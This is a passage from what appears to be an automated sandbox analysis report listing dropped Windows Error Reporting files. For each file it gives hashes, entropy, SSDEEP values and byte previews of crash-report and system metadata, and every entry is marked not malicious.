Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5AC.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6962866589980767
Encrypted:	false
SSDEEP:	96:TiZYW8s8UZTuYlYZWIHqYEZS2htAiv4hPVgwCGioaXfabMk1eFIx1i:2ZD89Sn+7aXibMceax1i
MD5:	F86CC7200D91E0A6E5246E1C9D1A7F70
SHA1:	9DC4CBADDE62DB5ED4F270A15DF43A13AAC7DBFF
SHA-256:	756040F204B402AF9AF790E55E2299EBCBF81535B0B4607D8D7D6644A000C516
SHA-512:	DFA411E78A95D3B51C9850FFF1AF4949A4CC7CFB87BE5CDDE1587B84BF28CF9CF9E4D23E5B805A9BDCA87A684EED8307A47D3F2AB21E9E5D13037434BB652101
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2FB.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	96878
Entropy (8bit):	3.056740546095891
Encrypted:	false
SSDEEP:	1536:L8ycPZHd3E0vcnSqhgbH4+7Vgrc+MTBzqbcuYJ11jRN9vqTZ+:L8ycPZHd3E0vcnSqhgbH4+7Vgrc+KBzH
MD5:	7A774DCC5289F7EF643D4D2264D248A8
SHA1:	BC054B550AA2DD7277977533520EC50EEE703BB0
SHA-256:	40EAFFDDED22E824C68626B9E00C50778A621D5CA05E77155E1DFDD1D7DE66AF
SHA-512:	5E3CABD88B29E696064C0AE11835D75830FB8D481787F4729F9207154A8E301E9073E19FF15E8253FC23B5C02213A0C9087255C6F25CF4070DDF60320039F2B6
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB415.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6965647508002184
Encrypted:	false
SSDEEP:	96:TiZYW8F8uG/cYRYWWfH0YEZV/AtAiP4vPVkww5SZZaDfa5Mke0IY1s:2ZD8nWRC0aDi5MkejY1s
MD5:	C88BC679003BBC5ADF51FC481F3DF10E
SHA1:	4971FED54CD1491F1FB5309B5BF59116FFA6D54B
SHA-256:	F6C9B695A6608CCD132CFAA8DFAAFA321168852B5261E7BB98BE1365782A3F57
SHA-512:	96D4534EB99319111F652C2545DE839E39BDE361B19C756313A097166A7BCA8BD38CEB87DA3778010B03FD920805659D222AB3E625B04B158008175EF9C89EEF
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9D3.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	97578
Entropy (8bit):	3.056304962184682
Encrypted:	false
SSDEEP:	1536:XRyg2Zx5MTHnyhpFH4ONoMLkMTBzqbLt1ART/vluG:XRyg2Zx5MTHnyhpFH4ONoMLkKBzqbLta
MD5:	D3235E589DC2A65EE7D071214F58DFEC
SHA1:	B7D2837CD29EF2FBF4D062D3813E38BC5431B2D7
SHA-256:	1176F507C5D826FF717DDFB2E0D2F6F0D0CFED4FD4A97B467B96F2EBC6671C5A
SHA-512:	D5678F25706921319C4324CC2A0FB66DA6E2DDB62EF74952BCF4F121892A2A9F7445859B4007B6126A8567B74D127491750D5735D61494DB37F924CBFC6F2B13
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC0BA.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.696957947489968
Encrypted:	false
SSDEEP:	96:TiZYW8GCEBsJYyYu+WEH6YEZQzGutAi/4wPV5wT9tcE7aafaR7PMjeOIr10:2ZD8h1vBZcYaaiR7PMjeZr10
MD5:	A0AAB60854055A4EDFDA7E7A52AC6184
SHA1:	2765BA72D8B1E01622BE3E03B07750DA954A884A
SHA-256:	B29C24C82C7038BFD944DC99A2A5D89BC84614C7656F43D0D97D8227A0CE6ED6
SHA-512:	8E02AA3D465F36E32B27254C1713D610BF8925DA78E78308E9F0D4EE355F55A8A174F804613D00D08322C1AD730947DFBEF715D3441B2E1539DB650E8D4B9414
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC78D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Mar 28 08:15:29 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	144968
Entropy (8bit):	3.425851155158607
Encrypted:	false
SSDEEP:	1536:wg/UPpN4uE2aOhLTgH88WUVMAwWNj1bxIZCD47A9qh+pjfVtzd:/U/4uEqhLTgcLAwQN47A9T
MD5:	732EB777778B75FCED9CE6E0DAB9C116
SHA1:	80842DE5343F33D94D96E6C1D512F76EB6B9ADA4
SHA-256:	E0C81D659490AB3BE5004F17264C62A5CF76F5AC961C9C2D940F571A9C596C2C
SHA-512:	77E0A398EF53A36445F2B2A85B46D96873FE79AD08D66757AC543261C1F62C9287DF25959E6C46347FCE6E0DA91BB7BBCC0CA202800CA20F5F851A4CF48ACE7D
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .......!'.f........................4...........$...........4...28..........`.......8...........T............&..x.......................................................................................................eJ......t.......GenuineIntel............T............'.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA40.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	96716
Entropy (8bit):	3.0552443523762656
Encrypted:	false
SSDEEP:	1536:zvCG/NVy/S9ZhPZbTa51h6MMD5dxDfMTBzqbu1wRWvDPAmT:zvCG/NVy/S9ZhPZbTa51h6MMD5dxDfKp
MD5:	0ED7AF2000D5CE089232EB17859725A3
SHA1:	72BB84FB696E04E706575C51F931DCBF02D9E7C1
SHA-256:	35C9CE244E59758FEBD0B1F9148EFC1A09985DF18C052CA028A1D4525E7B8252
SHA-512:	35F73081FF7ED80EE26669463687C910DC70C07E1B40C371D43990967C4FDF3C3CD4422B6333F8C77BAA0CF5A1D7C33CA974C7BC796CAB1E92A225C7EE07CC59
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA60.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	96716
Entropy (8bit):	3.055127177647137
Encrypted:	false
SSDEEP:	1536:c7vG/NVy/S9ZhPZbTa5fh6MMD5dxDfMTBzqbJ1NRhvI/coT:c7vG/NVy/S9ZhPZbTa5fh6MMD5dxDfKd
MD5:	754C9B4562746D2F210CAE55D3C3FB58
SHA1:	5D54C0402B1056A825265872826C4A8DA06C53FB
SHA-256:	FA6992FE9D51F8137D69DB21EFC05D844249C6AEECC42FCDAD3D3BF7393B2E1F
SHA-512:	7BD17DE52D137CBFEE8DA891FD076201051D5BF69950ECD9A0CA593BEBCE217E546EF27D013C0B04249E55A0BEF2C5A4D2F5291775EFD7F8794E94B7533B0D89
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB0D.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.697166188918097
Encrypted:	false
SSDEEP:	96:TiZYW8zURTbYIYGwW7HrYEZHitAiq43PVEwDP4V5/a9fayKMeexTIO10:2ZD8GPRbMea9ifMeexcO10
MD5:	B47869228C992A9021E3DC351982CEBA
SHA1:	0DD6B2A0CC49C30F860BC5C19F1A664466B8CD32
SHA-256:	2D5FE4094479004B69FF47736B5E44A76C070B54CD2B23B54A8B7E9C0D3799B5
SHA-512:	8AC5304234BD88A153B7CD6D150F46BFDBBCEDD48D63355B431F7F2F9CBE75962B812E6CFCE603ED2BD8D1A20AB9AD5BE97CF8369F9DB56D057969BFFE7A6C69
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB3D.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6972820295385653
Encrypted:	false
SSDEEP:	96:TiZYW8KT28NYZYIgW+HrYEZOAtAiy43PVXwWpguaafajM3e1Ih10:2ZD8M+/vA7aaijM3eKh10
MD5:	97BA8963EC2225E519C265235F6AF2E2
SHA1:	C576453845EF54AAAB694331C4A0047B006C7F8B
SHA-256:	AD0D60B30B837D5C09B834BCFF033267E7C7A3787EE698C6E8F3EFFB9ECBCF65
SHA-512:	C6439103B44CD7D5CCE7FB6833A397073662EFDA17F5B9FDC513ADC9E4EE359ABA3F4C3A7350ECED227EC2406A3CE1E502B1E2C528F2649D7B7B0866701F2D69
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC32.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6376
Entropy (8bit):	3.733899331787496
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbAK6m+YG4xPQE/RxAgaM4UE89btSasfiXgm:R6l7wVeJAK6JYG4JhprE89bQasfiQm
MD5:	ACC7277EFFD5FE8BE5EF52019EAC5FC1
SHA1:	E365178CA8AE84C328C2BB4A7B6B3143E0E9BDC0
SHA-256:	DD62C84327A0A3A117165E0547D7F37D22A0B118CA224C5BB234D89728C9B28C
SHA-512:	A2BB026E32B1B362B2B6F4F3B95B52284C4127904E60D3D39BDAF63C678C93D421B338170AEB5C2397A02080F489CFB5DEFB57321A167485A2700917570D32AF
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC81.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4732
Entropy (8bit):	4.539049628607216
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg77aI9fMWpW8VYqPYm8M4JIVgNAFJ+q8qrg8/e4qYvd:uIjfaI7xl7V7SJIVgiTrgCejYvd
MD5:	F889FA7F86165E09C631B328D8A2BA1B
